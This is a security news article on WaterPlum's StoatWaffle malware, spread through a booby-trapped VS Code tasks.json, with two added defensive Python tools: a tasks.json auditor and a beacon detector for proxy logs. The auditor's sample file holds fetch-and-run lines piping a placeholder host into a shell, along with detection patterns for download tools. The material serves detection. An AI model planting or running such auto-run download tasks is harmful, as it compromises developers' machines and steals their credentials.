
Previously relying on the OtterCookie malware, this cluster began deploying StoatWaffle around December 2025. The new attack chain targets software developers specifically, using a malicious Visual Studio Code (VSCode) configuration planted inside a code repository as the trap.
The VSCode Attack Flow
According to JP Security, the attack begins when developers are lured into downloading a decoy project related to blockchain technology. The malicious component is hidden inside the repository's .vscode directory, which contains a specially crafted tasks.json file.
Once the task is triggered, it quietly downloads the next stage from a web application hosted on Vercel.
The task itself is cross-platform. On Windows, the first stage is a simple downloader run from the command prompt, which immediately fetches a batch file named vscode-bootstrap.cmd.
The bootstrap script follows a fixed sequence to prepare the victim's machine for the final payload:
- It checks whether Node.js is already installed on the host.
- If the runtime is missing, it downloads and installs Node.js directly from the official website.
- It then retrieves two files named env.npl and package.json.
- It runs env.npl with the newly installed Node.js runtime, which launches the malware.
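The entry point of this chain is a tasks.json whose task fires without the developer choosing to run it. VS Code's documented mechanism for that is `"runOptions": {"runOn": "folderOpen"}`; the report does not say which setting the campaign uses, so that is an assumption here. The following Python is an added example, not code from the report, from JP Security or from the attacker's repository: it parses a tasks.json (including the comments and trailing commas the format allows), flattens each task's command line across the Windows, macOS and Linux overrides, and flags tasks that auto-run, fetch remote content, spawn an interpreter or hide their terminal. The sample file, the host `example.invalid` and the paths in it are constructed to model the described behaviour.

```python
"""Audit a VS Code tasks.json for tasks that run by themselves and fetch or
execute remote content. Added example: the sample file, host name and paths
below are constructed, not taken from the StoatWaffle repositories."""
import json
import re

def strip_jsonc(text):
    """Drop // and /* */ comments and trailing commas (allowed in tasks.json,
    rejected by json.loads). Strings are copied verbatim, so the // inside a
    https:// URL in a command survives."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # keep the escaped char as-is
                out.append(text[i + 1]); i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True; out.append(c)
        elif text.startswith("//", i):           # line comment
            j = text.find("\n", i); i = n if j == -1 else j; continue
        elif text.startswith("/*", i):           # block comment
            j = text.find("*/", i + 2); i = n if j == -1 else j + 2; continue
        else:
            out.append(c)
        i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))

def parse_jsonc(text):
    return json.loads(strip_jsonc(text))

# Command-line indicators worth flagging: remote fetches and interpreter spawns.
NETWORK_RE = re.compile(r"https?://|\bcurl\b|\bwget\b|Invoke-WebRequest|Invoke-RestMethod"
                        r"|\biwr\b|\bbitsadmin\b|\bcertutil\b|Start-BitsTransfer", re.I)
EXEC_RE = re.compile(r"\bpowershell\b|\bpwsh\b|\bcmd(\.exe)?\s+/c\b|\|\s*(ba)?sh\b"
                     r"|\b(ba)?sh\s+-c\b|\bnode\s+-e\b|-EncodedCommand|\s-enc\b", re.I)

def task_command_text(task):
    """Flatten command and args, including the windows/osx/linux overrides."""
    parts = []
    for scope in (task, task.get("windows"), task.get("osx"), task.get("linux")):
        if not isinstance(scope, dict):
            continue
        cmd = scope.get("command")
        parts.append(cmd.get("value", "") if isinstance(cmd, dict) else str(cmd or ""))
        for arg in scope.get("args") or []:         # args may be {"value": ...} objects
            parts.append(str(arg.get("value", "")) if isinstance(arg, dict) else str(arg))
    return " ".join(parts)

def audit_tasks_json(text):
    """Return one finding per suspicious task; a clean file yields []."""
    findings = []
    for task in parse_jsonc(text).get("tasks", []):
        auto = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        cmd = task_command_text(task)
        net, spawn = bool(NETWORK_RE.search(cmd)), bool(EXEC_RE.search(cmd))
        hidden = (task.get("presentation") or {}).get("reveal") == "never" or bool(task.get("hide"))
        reasons = [r for ok, r in ((auto, "auto-runs on folder open"),
                                   (net, "fetches remote content"),
                                   (spawn, "spawns a shell or script interpreter"),
                                   (hidden, "hides its terminal or itself")) if ok]
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"),
                             "severity": "high" if auto and (net or spawn) else "medium",
                             "reasons": reasons, "command": cmd})
    return findings

# Constructed tasks.json modelled on the report's description; not the real file.
SAMPLE_TASKS_JSON = r"""{
  // harmless-looking build task plus the trap
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/bootstrap | sh",
      "windows": { "command": "cmd", "args": ["/c",
        "curl -fsSL https://example.invalid/bootstrap.cmd -o %TEMP%\\vscode-bootstrap.cmd && %TEMP%\\vscode-bootstrap.cmd"] },
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
      "hide": true
    }
  ]
}"""

if __name__ == "__main__":
    for f in audit_tasks_json(SAMPLE_TASKS_JSON):
        print(f"[{f['severity']}] {f['label']}: {'; '.join(f['reasons'])}")
```

Two practical notes. First, VS Code only runs folderOpen tasks in a folder the user has trusted and has allowed automatic tasks for, so the social-engineering step is what gets the developer past those prompts; a cloned repository should be opened in Restricted Mode until its .vscode directory has been read. Second, the indicator lists are a starting point, not a complete catalogue: a task that only runs `npm install` can still pull a malicious package, so the scanner is best used to surface tasks for human review rather than as a verdict.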
Inside The StoatWaffle Malware
The env.npl script is the primary loader for StoatWaffle. Once running, it polls the command and control server every five seconds by requesting a specific error-message endpoint.
If the server responds with an error status, the script executes the message it received as Node.js code, so the next stage arrives disguised as an error response. After roughly five minutes of polling, a second downloader is retrieved and run.
This second script switches to a different error-handling endpoint and keeps the same five-second cycle to fetch and execute further instructions.
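A loader that polls a fixed host every five seconds and keeps receiving error responses is a pattern a SOC can hunt for in proxy logs. As an added example, not code from the report or from JP Security, the following Python groups requests by source and destination host, measures the gap between consecutive requests and flags pairs whose gap sits at a steady period with almost no spread. It ignores the path on purpose, so the switch to a second endpoint after about five minutes does not split the signal. The log format, the five-second period and the hosts and paths are constructed placeholders and assumptions, not observed values.

```python
"""Flag hosts that a client polls at a fixed interval with error responses,
the pattern the report attributes to StoatWaffle's loader. Added example:
the proxy log lines are constructed, and the hostnames are placeholders."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

LOG_FORMAT = "%Y-%m-%dT%H:%M:%SZ"

def parse_line(line):
    """Line format (constructed): '<ts> <src_ip> <method> <host> <path> <status>'."""
    ts, src, _method, host, path, status = line.split()
    return datetime.strptime(ts, LOG_FORMAT), src, host, path, int(status)

def detect_beacons(lines, period=5.0, jitter=0.5, min_hits=12):
    """Group requests by (source, host); report pairs whose inter-request gap
    sits at `period` with almost no spread. The path is deliberately ignored so
    a switch to a second endpoint does not split the signal."""
    by_pair = defaultdict(list)
    for line in lines:
        ts, src, host, path, status = parse_line(line)
        by_pair[(src, host)].append((ts, path, status))
    findings = []
    for (src, host), events in by_pair.items():
        if len(events) < min_hits:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        median, spread = statistics.median(gaps), statistics.pstdev(gaps)
        if abs(median - period) > jitter or spread > jitter:
            continue
        errors = sum(1 for e in events if e[2] >= 400)   # error replies are the signal
        findings.append({"src": src, "host": host, "hits": len(events),
                         "median_gap": median, "spread": round(spread, 2),
                         "error_ratio": round(errors / len(events), 2),
                         "paths": sorted({e[1] for e in events})})
    return findings

def make_sample_log():
    """Constructed log: 70 polls every 5 s answered with HTTP 500, switching
    endpoint after 60 polls (about five minutes), mixed with irregular traffic."""
    t0 = datetime(2025, 12, 10, 9, 0, 0)
    lines = []
    for i in range(70):
        path = "/api/error" if i < 60 else "/api/error2"
        ts = (t0 + timedelta(seconds=5 * i)).strftime(LOG_FORMAT)
        lines.append(f"{ts} 10.0.0.5 GET c2.example.invalid {path} 500")
    offset = 0
    for gap in (0, 7, 31, 2, 95, 140, 3, 44, 260, 12, 1, 300, 18, 9, 75):
        offset += gap
        ts = (t0 + timedelta(seconds=offset)).strftime(LOG_FORMAT)
        lines.append(f"{ts} 10.0.0.5 GET registry.example.invalid /pkg/{offset} 200")
    return sorted(lines)            # timestamp comes first, so lexical order is chronological

if __name__ == "__main__":
    for f in detect_beacons(make_sample_log()):
        print(f"{f['src']} -> {f['host']}: {f['hits']} hits every {f['median_gap']}s, "
              f"{f['error_ratio']:.0%} errors, paths {f['paths']}")
```

The error ratio is reported rather than used as a filter: it strengthens the case when it is high, but a server that answers 200 on idle polls would otherwise slip through. The tolerance and minimum hit count are tuning knobs; a loader that adds random sleep will widen the spread, so on real traffic it is worth also looking at the destination itself, such as a freshly created web application on a hosting platform that the organisation has no business with.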
This sequence deploys StoatWaffle's two main components: a Stealer module and a Remote Access Trojan (RAT). The Stealer is specialised for extracting sensitive information from development environments.
It targets credentials and browser-extension data stored by Chromium-based and Firefox browsers, scanning Firefox configuration files for specific keywords.
On macOS systems, the Stealer expands its reach by harvesting the entire Keychain database to capture stored passwords.
Finally, the RAT module provides a persistent backdoor into the compromised machine. It regularly contacts the server to request new tasks from a designated socket endpoint.
Once it receives and executes these commands, it submits the execution results to a results endpoint, giving WaterPlum continuous remote control over the developer's system.
The post WaterPlum Launches New StoatWaffle Malware via VSCode-Themed Attack appeared first on Cyber Security News.
